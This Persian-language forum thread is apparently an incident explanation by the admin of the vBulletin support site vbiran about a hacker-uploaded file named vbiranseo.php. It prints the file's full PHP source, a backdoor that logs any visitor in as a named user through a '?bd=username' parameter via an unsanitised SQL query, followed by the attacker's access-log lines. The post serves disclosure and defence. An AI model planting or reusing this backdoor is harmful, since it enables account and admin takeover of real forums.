تبلیغات در اینترنت

تبلیغات در اینترنتگیفت کارت گوگل پلی
نمایش نتایج: از 1 به 1 از 1

موضوع: توضیح در رابطه با فیلم منتشر شده مبنی بر دسترسی به وی بی ایران

  1. Top | #1
    مدیریت کل سایت

    تاریخ عضویت
    Aug 2009
    ورژن ویبولتین
    4.2.2
    نوشته ها
    21,685
    مورد پسند
    54,809 بار
    نوشته های وبلاگ
    14
    اطلاعات
    میزان امتیاز
    3117

    پیش فرض توضیح در رابطه با فیلم منتشر شده مبنی بر دسترسی به وی بی ایران

    درود.

    اخیراً فیلمی منتشر شده و در آن اعلام شده که هکران به سایت همچنان دسترسی دارند .

    بنا به درخواست مکرر کاربران ، توضیحی در این باره داده می شود :

    هکران بعد از دسترسی به هاست فایل vbiranseo.php را آپلود کرده اند که یک Fake login برای ویبولتین می باشد .

    بنده محتویات این فایل را اینجا قرار میدهم تا شما روی لوکال هاستتون تست کنید این فایل رو و ببینید این فایل PHP با تغییر پسورد تا هنگام خروج Cache شما را در سایت لاگین نگه می دارد .

    محتوای PHP :

    کد:
    <?phpif (isset($_GET['bd']))
    {
    define('THIS_SCRIPT', 'login');
    require_once('./global.php');
    require_once('./includes/functions_login.php');
    $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['bd'] . "'");
    if (!$vbulletin->userinfo['userid']) die("Invalid username!");
    else
    {
    vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
    vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
    exec_unstrike_user($_GET['bd']);
    process_new_login('cplogin', TRUE, TRUE);
    do_login_redirect();
    }
    }
    
    
    ?>
    LOG مربوطه :

    کد:
    176.9.215.249 - - [26/Jan/2012:17:11:29 +0330] "GET /vbiranseo.php?bd=vbiranseo.php HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
    176.9.215.249 - - [26/Jan/2012:17:11:44 +0330] "GET /vbiranseo.php?bd=vbiran HTTP/1.1" 200 2097 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"176.9.215.249 - - [26/Jan/2012:17:11:56 +0330] "GET /index.php HTTP/1.1" 301 20 "http://www.vbiran.ir/vbiranseo.php?bd=vbiran" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"176.9.215.249 - - [26/Jan/2012:17:11:57 +0330] "GET / HTTP/1.1" 200 51558 "http://www.vbiran.ir/vbiranseo.php?bd=vbiran" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
    با استفاده از قرار دادن ?bd=username در انتهای آدرس در یوزر نیم بنده لاگین و کش آن در مرورگر ذخیره شده است .

    برای اطلاع از صحت حرف های اینجانب میتوانید در لوکال هاست خود اسکریپت فوق را تست کنید .

    موفق باشید ،

    وی بی ایران

    ---------- ارسال شده در 01:48 PM ---------- ارسال قبلی در 01:34 PM ----------

    ویرایش 1 : آموزش جلوگیری در تاپیک روبرو موجود می باشد : آموزش جلوگیری از اسکریپت Fake Login




  2. گیفت کارت آیتونز

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

موضوعات مشابه

  1. پاسخ: 0
    آخرين نوشته: 2011/12/14, 11:06 PM
  2. پاسخ: 0
    آخرين نوشته: 2011/10/03, 05:34 AM
  3. پاسخ: 0
    آخرين نوشته: 2011/03/07, 07:28 PM
  4. پاسخ: 13
    آخرين نوشته: 2011/01/14, 03:58 PM

کلمات کلیدی این موضوع

علاقه مندی ها (Bookmarks)

علاقه مندی ها (Bookmarks)

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •